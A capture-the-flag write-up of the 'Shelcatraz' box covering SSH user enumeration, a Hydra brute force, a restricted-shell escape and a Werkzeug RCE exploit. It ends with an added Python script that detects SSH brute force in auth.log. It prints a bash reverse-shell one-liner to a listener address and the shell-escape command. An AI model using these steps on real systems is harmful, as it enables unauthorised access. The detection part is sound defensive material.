Shelcatraz
==========

First I found that SSH was the only port open on the server, so I checked the version and found that it was vulnerable to username enumeration. I used the Metasploit `ssh_enumusers` module to find that `amy` was registered as a user. I next used Hydra to brute-force the SSH password for `amy` and discovered the password was `cookie`. Once I was SSH'd into the box I could `cat flag1.txt` and get 20 points.

I found that the shell was locked down and it wasn't possible to perform many commands. After some searching I found a command on GitHub that would allow me to break out of the shell:

    echo FREEDOM! && cd () bash && cd

I was then able to `cat flag2.txt`, read the flag and gain 20 points.

I next performed a `netstat -antp` and found that there was an unfamiliar service available on the server at port 7777 behind the firewall. I wasn't able to disable the firewall, so I uploaded a Meterpreter payload to the server and set up a proxy forwarder from 8071 to 7777. I was then able to discover that the service on the port was Werkzeug. I checked Metasploit for Werkzeug and found an exploit ready to go for this version. I ran it and it wouldn't work. On further investigation it looked like the password hash on the Werkzeug server had been tampered with and it didn't match the exploit. I found another exploit on Exploit-DB: https://www.exploit-db.com/exploits/43905

I was able to modify this exploit to read in the hash but it still wouldn't work. After examining the hash it seemed that it had been base64 encoded. I decoded it and used the decoded hash in the 43905 exploit and was able to gain remote code execution. I set up a listener and passed the following as the RCE payload:

    /bin/bash -i >& /dev/tcp/192.168.195.1/8080 0>&1

I next received a shell as root on the server and could `cat flag3.txt` for 50 points.
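The first foothold above (username enumeration followed by a Hydra password guess against `amy`) leaves a very recognisable trail in `sshd` logging: a burst of `Failed password` lines from one source address, spread over several usernames, and then an `Accepted password` from the same address. The script below is an added detection example written for this writeup; it is not part of the original post or of any tool mentioned in it. The auth.log lines it parses are constructed sample data, the hostname `shelcatraz`, the addresses `192.0.2.5` and `198.51.100.9`, and the failure threshold of 5 are assumptions chosen for the demonstration.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/auth.log lines (not taken from the writeup).
# One source tries two non-existent users, then four wrong passwords for amy,
# then succeeds; a second source logs in cleanly with a key and should not fire.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 shelcatraz sshd[1201]: Invalid user admin from 192.0.2.5 port 51000
Jan 10 12:00:01 shelcatraz sshd[1201]: Failed password for invalid user admin from 192.0.2.5 port 51000 ssh2
Jan 10 12:00:02 shelcatraz sshd[1202]: Invalid user test from 192.0.2.5 port 51001
Jan 10 12:00:02 shelcatraz sshd[1202]: Failed password for invalid user test from 192.0.2.5 port 51001 ssh2
Jan 10 12:00:03 shelcatraz sshd[1203]: Failed password for amy from 192.0.2.5 port 51002 ssh2
Jan 10 12:00:04 shelcatraz sshd[1204]: Failed password for amy from 192.0.2.5 port 51003 ssh2
Jan 10 12:00:05 shelcatraz sshd[1205]: Failed password for amy from 192.0.2.5 port 51004 ssh2
Jan 10 12:00:06 shelcatraz sshd[1206]: Failed password for amy from 192.0.2.5 port 51005 ssh2
Jan 10 12:00:07 shelcatraz sshd[1207]: Accepted password for amy from 192.0.2.5 port 51006 ssh2
Jan 10 12:30:00 shelcatraz sshd[1300]: Accepted publickey for amy from 198.51.100.9 port 40000 ssh2
"""

# "invalid user" is optional: sshd omits it when the account exists, which is
# exactly the distinction a username-enumeration attempt is probing for.
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted \w+ for (\S+) from (\S+) port")


def analyze(log_text, threshold=5):
    """Return one finding per source IP whose failed-login count reaches
    `threshold`. Each finding records how many distinct usernames were tried
    (enumeration signal) and whether that same source later authenticated
    successfully (a brute force that worked, the highest-priority case)."""
    failed = defaultdict(list)   # src ip -> usernames that failed
    accepted = defaultdict(set)  # src ip -> usernames that succeeded

    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            user, ip = m.groups()
            failed[ip].append(user)
            continue
        m = ACCEPTED_RE.search(line)
        if m:
            user, ip = m.groups()
            accepted[ip].add(user)

    findings = []
    for ip, users in failed.items():
        if len(users) < threshold:
            continue
        findings.append({
            "src": ip,
            "failures": len(users),
            "distinct_users": len(set(users)),
            "success_after_failures": bool(accepted.get(ip)),
            "compromised_users": sorted(accepted.get(ip, ())),
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_AUTH_LOG):
        print(f)
```

Run against a real `auth.log` the same logic works unchanged; the threshold and the lack of a time window are deliberate simplifications, and a production rule would bucket failures per source into short windows rather than over the whole file. The `success_after_failures` flag is the field worth paging on: a password-guessing burst that ends in `Accepted password` is what the writeup's first stage looks like from the server's side, and it is the point at which enforcing key-based authentication or rate limiting at the SSH daemon would have stopped the chain.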